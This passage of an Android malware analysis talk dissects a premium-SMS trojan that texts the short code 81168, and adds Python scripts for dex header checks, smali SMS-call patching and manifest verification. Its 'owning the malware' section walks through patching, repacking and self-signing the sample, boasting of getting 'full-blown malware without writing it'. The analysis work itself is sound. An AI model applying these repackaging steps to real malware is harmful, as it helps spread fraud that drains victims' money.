  – Like data stealers, they send stolen data to specific URLs via HTTP POST
  – focus more on gathering personal data
• Android One-click Billing Fraud
  – Mostly active on p0rn and gamer video sites
  – Trying to view a video triggers a pop-up asking the user to download a malicious app
  – Gets the Android user account information and sends it to the cybercriminals
  – Displays a pop-up showing the message "We haven't received your payment. Therefore, based on our policy, we will have to charge you if you have not paid yet."
  – Also displays the information it stole in order to build credibility for itself and better convince the victim to pay the amount
  – The pop-up is set to show every few minutes and keeps eating your money
Why did I write my paper?
• Malware analysis is an important part of antimalware companies' work
• Mobile malware analysis is now equally important
• Effective analysis can be used by law enforcement agencies to catch law breakers, i.e. malware authors and attackers
• For fun, when you can pwn someone else's malware and control it
• You get yourself full-blown malware without writing it
Android mal-analysis tools of trade
Tools - Static analysis
• Mobile Sandbox: provides static analysis of malware images
• IDA Pro: supports Android (Dalvik) bytecode in version 6.1 and later
• APKInspector: powerful GUI tool for analyzing Android applications
• Dex2jar: for converting Android's .dex format to Java's .class format
• JD-GUI: a standalone graphical utility that displays the Java source code of .class files
• Androguard: reverse engineering and malware analysis of Android applications
• JAD: Java decompiler
• Dexdump: the .dex dump/disassembly tool that ships with the Android SDK; it prints the header, class list and Dalvik instructions but does not decompile to Java
• Smali: smali/baksmali is an assembler/disassembler for the dex format used by Dalvik, Android's Java VM implementation
Tools - Dynamic analysis
• Droidbox: an Android application sandbox for dynamic analysis
• The Android SDK: "a software development kit that enables developers to create applications for the Android platform." Using the Android SDK we can create a virtual Android device almost identical in functionality and capabilities to an Android phone, and using that virtual device as a contained environment we can execute the malware and observe its behaviour
• AndroidAuditTools: dynamic Android analysis tools
Lab setup
• Traditional malware analysis includes a virtual machine
• We need one as well
• Android SDK installed in the VM
• Well-documented installation details can be found at http://developer.android.com/sdk/installing.html
• Would highlight one thing during installation:
  – Must select at least one version of the API
  – API versions exist to develop applications for different Android versions
  – A separate SDK platform image is needed for malware targeting a particular version
  – Demo: Android 2.3 (Gingerbread)
Android Malware Acquisition
• Contagio MiniDump (http://contagiominidump.blogspot.in/)
  – Community driven
  – Anyone can submit a sample
  – It is made available to others
• Demo: Voodoo SimpleCarrierIQDetector
  – supposed to detect the presence of the Carrier IQ mobile diagnostic software on the system
  – chosen based on the ease of understanding
Mobile-sandbox.com
• Submit the apk to mobile-sandbox.com for analysis
• The generated report can be viewed at http://mobilesandbox.org/xml_report_static/?q=176
• Important information from the report:
  – Requested permissions from the Android manifest: android.permission.READ_LOGS, android.permission.SEND_SMS
  – Potentially dangerous calls: sendSMS, execution of native code, getPackageInfo
Extraction
• Start our manual analysis
• Need to extract the apk to get its contents
• An apk file is a zip-formatted package
• Extraction done with WinRAR or WinZip (any unzip tool works)
• File of interest is classes.dex, the compiled Dalvik bytecode
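Before handing classes.dex to dex2jar it is worth checking that the file is what it claims to be. The following is an added example, not code from the talk or from any of the tools it lists: it parses the fixed 0x70-byte dex header (magic, Adler-32 checksum, SHA-1 signature, then twenty little-endian u32 size/offset fields, as documented for the Dalvik format), verifies the two integrity fields, and recomputes them the way an assembler must after the bytecode has been edited. The sample dex is constructed inline with empty tables, so it only exercises the header logic.

```python
"""Parse a classes.dex header and check/repair its integrity fields."""
import hashlib
import struct
import zlib

DEX_HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678
FIELDS = (
    "file_size", "header_size", "endian_tag", "link_size", "link_off", "map_off",
    "string_ids_size", "string_ids_off", "type_ids_size", "type_ids_off",
    "proto_ids_size", "proto_ids_off", "field_ids_size", "field_ids_off",
    "method_ids_size", "method_ids_off", "class_defs_size", "class_defs_off",
    "data_size", "data_off",
)


def parse_dex_header(data: bytes) -> dict:
    """Return the header fields plus checksum_ok / signature_ok / layout_ok."""
    if len(data) < DEX_HEADER_SIZE:
        raise ValueError("shorter than a dex header")
    magic = data[:8]                                  # b"dex\n035\0" for Gingerbread-era files
    if not (magic.startswith(b"dex\n") and magic[7] == 0):
        raise ValueError(f"bad dex magic {magic!r}")
    hdr = dict(zip(FIELDS, struct.unpack_from("<20I", data, 32)))
    hdr["version"] = magic[4:7].decode()
    hdr["checksum"] = struct.unpack_from("<I", data, 8)[0]
    hdr["signature"] = data[12:32].hex()
    # The checksum covers everything after itself (offset 12 onward, so it includes
    # the signature); the signature covers everything after itself (offset 32 onward).
    hdr["checksum_ok"] = hdr["checksum"] == (zlib.adler32(data[12:]) & 0xFFFFFFFF)
    hdr["signature_ok"] = data[12:32] == hashlib.sha1(data[32:]).digest()
    hdr["layout_ok"] = (hdr["file_size"] == len(data)
                        and hdr["header_size"] == DEX_HEADER_SIZE
                        and hdr["endian_tag"] == ENDIAN_CONSTANT)
    return hdr


def fix_dex_integrity(data: bytes) -> bytes:
    """Recompute file_size, then the signature, then the checksum (in that order,
    because the checksum covers the signature). Dalvik rejects a dex whose
    checksum is stale, which is why a patched dex must be re-assembled."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, 32, len(buf))
    buf[12:32] = hashlib.sha1(buf[32:]).digest()
    struct.pack_into("<I", buf, 8, zlib.adler32(buf[12:]) & 0xFFFFFFFF)
    return bytes(buf)


def build_sample_dex(data_section: bytes = b"") -> bytes:
    """Constructed minimal dex: valid header, empty tables, opaque data section."""
    hdr = bytearray(DEX_HEADER_SIZE)
    hdr[:8] = b"dex\n035\0"
    values = dict.fromkeys(FIELDS, 0)
    values.update(header_size=DEX_HEADER_SIZE, endian_tag=ENDIAN_CONSTANT,
                  data_size=len(data_section),
                  data_off=DEX_HEADER_SIZE if data_section else 0)
    struct.pack_into("<20I", hdr, 32, *(values[f] for f in FIELDS))
    return fix_dex_integrity(bytes(hdr) + data_section)


if __name__ == "__main__":
    sample = build_sample_dex(b'constructed data section')
    print({k: v for k, v in parse_dex_header(sample).items() if k.endswith("_ok")})
    tampered = bytearray(sample)
    tampered[-1] ^= 0xFF                              # one flipped byte in the data section
    print({k: v for k, v in parse_dex_header(bytes(tampered)).items() if k.endswith("_ok")})
```

A file that fails the checksum or signature check has either been truncated in transit or edited by hand without re-assembly; either way dex2jar output for it should be treated with suspicion.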
dex2jar
• C:> dex2jar.bat classes.dex
  – Output: classes_dex2jar.jar
• Converts the classes.dex file extracted from the apk to a jar file
JD-GUI
• To read the code from the .class files in the jar
• Open the jar file with JD-GUI
• Four .class files
  – Detect.class
    • The code tries to make out whether CarrierIQ software is installed on the system, based on some checks
  – R.class
    • Every Android application contains this class file. Here it is used to declare a few variables
  – Utils.class
    • Contains a few utility method definitions like findFiles, getCommandOutput etc.
  – Main.class
    • This is the most interesting class as it actually contains the malicious code
    • (The original deck shows a screenshot of the decompiled code at this point; what it does is described next)
Code Analysis
• Four identical calls that send an SMS to the number "81168", with four different SMS texts
  – AT37
  – MC49
  – SP99
  – SP93
• A Google search on the number shows that it is a premium rate SMS number that costs almost € 9/SMS
• This is how hackers make money with mobile malware
• Some malware also listens for incoming messages
  – and deletes them before the user can read them if they are from the service provider, which would inform users about their balance or billing charges
I haz you
• I know the premium rate phone number
• I know the text messages being sent
• If interested in catching the crooks,
  – find the country and the operator the number belongs to
  – persuade them to disclose the information on the attacker/malware author
  – Google helps a lot, with substantial information available publicly regarding the same
• If you get the police involved, the chances of catching the hax0r are big
Scam
• On Google I found a funny but very interesting Facebook scam around this number
• Like other scam Facebook applications,
  – a user gets messages from his friends on Facebook asking him to vote for his friend in some "Miss and Mister" contest, giving an infected web link
  – Following the link actually hacks the Facebook account, rendering it unusable for the user
  – The attacker then calls him/her up, telling him that his account has been blocked for so-and-so reason
  – Hence he has to send an SMS to the mentioned number "81168" with any of the 4 texts
  – He will receive a code that has to be given to the caller (who is the hacker) to unlock his Facebook account
Owning the malware
• Finished with the analysis
• Extracted information on the malware author
• Let's own the malware and make it dance to our tunes
• The following technique explains the process to own the malware we just analyzed; it can be fairly generalized
Baksmali
• Program used to disassemble dex files
• Disassembles the .dex file to .smali files
• Names similar to the .class files
• Can be opened in any text editor
• C:> java -jar baksmali-0.93.jar -o smali-out classes.dex
  – (smali/baksmali 2.x use subcommands instead: baksmali d classes.dex -o smali-out)
• File containing the malicious code
  – Main$1.smali
  – the first anonymous inner class of Main (the Main.class identified in the analysis phase)
  – Open it in a text editor
• Change the destination number of the SMS
  – i.e. the first argument to sendTextMessage: the const-string loaded into that register just before the invoke
• Set it to your mobile number or any other
• Save the file
• Demo: changing it to the console port number of my Android emulator (emulators address each other by port, e.g. 5554 and 5556)
Smali
• Used to assemble the .smali files back into a .dex file
• After making the desired changes to the smali file
• Save it, then assemble all the .smali files together to classes.dex using
• C:> java -jar smali-0.93.jar smali-out -o classes.dex
  – (smali 2.x: smali a smali-out -o classes.dex)
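The two manual steps above, reading the sendTextMessage calls out of the decompiled code (Code Analysis) and rewriting the destination number in the .smali file, can be done over baksmali output directly, which is handy when a sample has dozens of such calls. The script below is an added example, not code from the talk or from the smali project: SAMPLE_SMALI is constructed to mimic what baksmali emits for the Java calls described in the analysis (only two of the four texts are included), and 5556 is an assumed emulator console port standing in for the analyst's own number. It resolves only string literals set in the same method; a destination loaded from a field, a resource or a decrypted buffer is reported as <dynamic> and still needs a human.

```python
"""Locate SmsManager.sendTextMessage sinks in smali and patch their destination."""
import re
from dataclasses import dataclass

CONST_STRING = re.compile(r'^\s*const-string(?:/jumbo)?\s+([vp]\d+),\s*"((?:[^"\\]|\\.)*)"')
INVOKE = re.compile(r'^\s*invoke-(?:virtual|super|direct|static|interface)(?:/range)?\s+\{([^}]*)\},\s*(\S+)')
SEND_TEXT_MESSAGE = "Landroid/telephony/SmsManager;->sendTextMessage("


@dataclass
class SmsSink:
    invoke_line: int   # 0-based line of the invoke instruction
    dest_line: int     # line of the const-string that loaded the destination, or -1
    destination: str   # "<dynamic>" when not a literal in this method
    text: str


def _expand_regs(spec: str) -> list:
    """'v0, v1, v3' -> ['v0','v1','v3']; the /range form 'v0 .. v5' -> v0..v5."""
    m = re.fullmatch(r'\s*([vp])(\d+)\s*\.\.\s*[vp](\d+)\s*', spec)
    if m:
        return [f"{m.group(1)}{i}" for i in range(int(m.group(2)), int(m.group(3)) + 1)]
    return [r.strip() for r in spec.split(",") if r.strip()]


def find_sms_sinks(smali: str) -> list:
    """Track the last const-string per register inside each method and resolve the
    arguments of sendTextMessage(dest, scAddress, text, sentIntent, deliveryIntent)."""
    sinks, last_const = [], {}
    for i, line in enumerate(smali.splitlines()):
        if line.startswith(".method"):
            last_const = {}                       # registers are per method
            continue
        m = CONST_STRING.match(line)
        if m:
            last_const[m.group(1)] = (i, m.group(2))
            continue
        m = INVOKE.match(line)
        if m and m.group(2).startswith(SEND_TEXT_MESSAGE):
            regs = _expand_regs(m.group(1))      # regs[0] is the SmsManager receiver
            if len(regs) < 4:
                continue
            dest = last_const.get(regs[1], (-1, "<dynamic>"))
            text = last_const.get(regs[3], (-1, "<dynamic>"))
            sinks.append(SmsSink(i, dest[0], dest[1], text[1]))
    return sinks


def is_short_code(number: str) -> bool:
    """Premium-rate services are typically 4-6 digit short codes, like 81168."""
    return re.fullmatch(r"\d{4,6}", number) is not None


def patch_destination(smali: str, new_number: str) -> str:
    """Rewrite every literal destination that feeds sendTextMessage."""
    lines = smali.splitlines()
    for sink in find_sms_sinks(smali):
        if sink.dest_line >= 0:
            lines[sink.dest_line] = re.sub(r'"[^"]*"', f'"{new_number}"',
                                           lines[sink.dest_line], count=1)
    return "\n".join(lines) + "\n"


# Constructed smali, modelled on baksmali output for the calls seen in Main$1
SAMPLE_SMALI = """\
.class Lcom/example/Main$1;
.super Ljava/lang/Object;
.method public onClick(Landroid/view/View;)V
    .registers 7
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v0
    const-string v1, "81168"
    const/4 v2, 0x0
    const-string v3, "AT37"
    const/4 v4, 0x0
    const/4 v5, 0x0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    const-string v3, "MC49"
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    return-void
.end method
"""

if __name__ == "__main__":
    for s in find_sms_sinks(SAMPLE_SMALI):
        flag = "PREMIUM?" if is_short_code(s.destination) else ""
        print(f"line {s.invoke_line}: to {s.destination} text {s.text!r} {flag}")
    print(patch_destination(SAMPLE_SMALI, "5556"))   # assumed emulator console port
```

Run it over the smali-out directory produced by baksmali (one file at a time), write the patched text back, and assemble with smali as in the step above; the assembler recomputes the dex checksum and signature, so never copy the edited .smali back without that step.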
Packing
• Delete the META-INF folder
  – MANIFEST.MF contains a SHA1 digest of every file in the apk, including classes.dex
  – that digest will not match the changed classes.dex file
  – the folder also holds the apk signing information (typically CERT.SF and CERT.RSA), which has to be replaced
• The private key of the original author is not available
• Have to sign the apk with our own private key
• With the modified classes.dex, pack the files back into a .zip file using any packer utility
• Change the extension from .zip to .apk
Signing
• Android requires an application (apk) to be signed with the owner/author's private key
• Cannot install on an emulator or a device if it is not signed
• Can use self-signed certificates to sign applications
• No certificate authority is needed
• To sign we need
  – keytool
  – jarsigner
Keytool
• Comes as part of the JDK installation
• Used to create the private key for signing
• C:> keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
  – prompts for passwords for the keystore and the key
  – and for the Distinguished Name fields
Jarsigner
• Comes as part of the JDK installation
• Used to sign the apk with the created keystore
• C:> jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore my-release-key.keystore carrieriq.apk alias_name
  – modifies the APK in place
  – creates the META-INF folder with the signing details
  – APK is now signed
  – Caveat: MD5withRSA/SHA1 was the combination the Android docs of the time gave for JDK 7 compatibility with old devices; current JDKs disable MD5 for JAR signing and treat such jars as unsigned, so use -sigalg SHA1withRSA (or sign with apksigner from the SDK build-tools)
• To verify that the apk is signed
• C:> jarsigner -verify -verbose carrieriq.apk alias_name
• If signed properly, it outputs "jar verified."
• Voila!
• Got ourselves a malware
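The reason the Packing step deletes META-INF, and what jarsigner -verify checks first, can be shown on a toy apk. The following is an added example, not code from the talk: it builds an apk in memory from constructed placeholder entries (not a real app), writes a MANIFEST.MF in the form jarsigner produces (one section per file with its base64 SHA-1 digest), swaps in a modified classes.dex while carrying the old META-INF over unchanged, and reports the stale digest. Only the manifest digests are checked here; the .SF/.RSA signature files are left to jarsigner -verify or apksigner verify.

```python
"""Compare MANIFEST.MF SHA1-Digest entries with the files actually in the apk."""
import base64
import hashlib
import io
import zipfile


def _b64_sha1(data: bytes) -> str:
    return base64.b64encode(hashlib.sha1(data).digest()).decode()


def build_manifest(entries: dict) -> str:
    """Minimal MANIFEST.MF: CRLF line endings, a blank line between sections."""
    lines = ["Manifest-Version: 1.0", "Created-By: example", ""]
    for name, data in entries.items():
        lines += [f"Name: {name}", f"SHA1-Digest: {_b64_sha1(data)}", ""]
    return "\r\n".join(lines) + "\r\n"


def parse_manifest(text: str) -> dict:
    """Return {entry name: SHA1-Digest}. A line starting with a space continues
    the previous one (the manifest format folds lines longer than 72 bytes)."""
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)
    digests, name = {}, None
    for line in unfolded:
        if not line.strip():
            name = None
        elif line.startswith("Name: "):
            name = line[len("Name: "):]
        elif name and line.startswith("SHA1-Digest: "):
            digests[name] = line[len("SHA1-Digest: "):]
    return digests


def make_apk(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", build_manifest(entries))
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def repack_keeping_metainf(apk: bytes, new_dex: bytes) -> bytes:
    """The mistake the Packing step warns about: replace classes.dex but keep
    the original META-INF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(apk)) as src, \
            zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            dst.writestr(name, new_dex if name == "classes.dex" else src.read(name))
    return buf.getvalue()


def verify_manifest_digests(apk: bytes) -> dict:
    """Map each entry to 'ok', 'MISMATCH', 'missing-from-zip' or 'unlisted'."""
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        names = set(zf.namelist())
        listed = parse_manifest(zf.read("META-INF/MANIFEST.MF").decode())
        status = {}
        for name, expected in listed.items():
            if name not in names:
                status[name] = "missing-from-zip"
            else:
                status[name] = "ok" if _b64_sha1(zf.read(name)) == expected else "MISMATCH"
        for name in names - set(listed):
            if not name.startswith("META-INF/") and not name.endswith("/"):
                status[name] = "unlisted"     # a file the signer never covered
    return status


# Constructed sample contents; placeholders, not real Android artifacts
SAMPLE_ENTRIES = {
    "AndroidManifest.xml": b"<manifest placeholder/>",
    "classes.dex": b"dex\n035\0" + b"\0" * 104 + b'const-string v1, "81168"',
}
SAMPLE_APK = make_apk(SAMPLE_ENTRIES)
PATCHED_DEX = SAMPLE_ENTRIES["classes.dex"].replace(b"81168", b"5556")

if __name__ == "__main__":
    print("original:", verify_manifest_digests(SAMPLE_APK))
    print("repacked:", verify_manifest_digests(repack_keeping_metainf(SAMPLE_APK, PATCHED_DEX)))
```

The same check is useful from the defender's side, with one caveat: a repackaged sample that was re-signed as in the Signing step carries a fresh, internally consistent META-INF and passes digest checks. Detecting that case means comparing the signing certificate in CERT.RSA against the one the legitimate developer uses, not just the digests.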
Install the apk (malware) on the Android SDK emulator
• To verify the behavior that we modified
• Open two instances of the Android emulator
• Install the new malware on one of them
• The SMS number we patched in should be the console port number of the other emulator (the one without the malware); emulators deliver SMS to each other by port number
• Install and run the app
• As soon as the uninstall button is clicked
• The SMS gets sent to the other emulator
I pwn your maal
• I modified your malware
• Customized it to my need
• Now I pwn your maal
• It will serve me now
• ☺ (evil grin)
Summary
• Overview of how the Android smartphone OS has become the most popular target for attackers
• Describes the different types of malware being created for the Android platform
• Attempts to explain
  – the lab setup
  – the tools required
  – static and dynamic malware analysis
  – practically analyzing a real premium-SMS-sending malware
• After analysis
  – the origin of the malware is known
  – we know how to own the malware
• In short, "I haz you and pwn your maal".